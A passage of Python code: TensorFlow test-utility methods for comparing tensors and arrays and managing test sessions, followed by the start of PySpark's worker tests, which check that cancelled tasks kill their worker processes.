msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
sess = self._create_session(graph, config, use_gpu, force_gpu)
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
# We need to do this to make sure the session closes, otherwise, even
# if the user does with self.session():, it will not close the session.
with constrained_sess:
yield constrained_sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
with self._get_cached_session(
graph, config, use_gpu, force_gpu,
crash_if_inconsistent_args=True) as sess:
yield sess
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
with self._get_cached_session(
graph, config, use_gpu, force_gpu,
crash_if_inconsistent_args=False) as sess:
yield sess
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.float) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
def _create_session(self, graph, config, use_gpu, force_gpu):
"""See session() for details."""
if context.executing_eagerly():
return None
else:
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
@contextlib.contextmanager
def _get_cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if context.executing_eagerly():
yield None
else:
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, use_gpu=use_gpu, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_use_gpu = use_gpu
self._cached_force_gpu = force_gpu
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
yield constrained_sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_use_gpu is not use_gpu:
raise ValueError(
"The use_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
# If you modify this logic, make sure to modify it in _create_session
# as well.
sess = self._cached_session
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
yield constrained_sess
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource # noqa: F401
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
pass
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
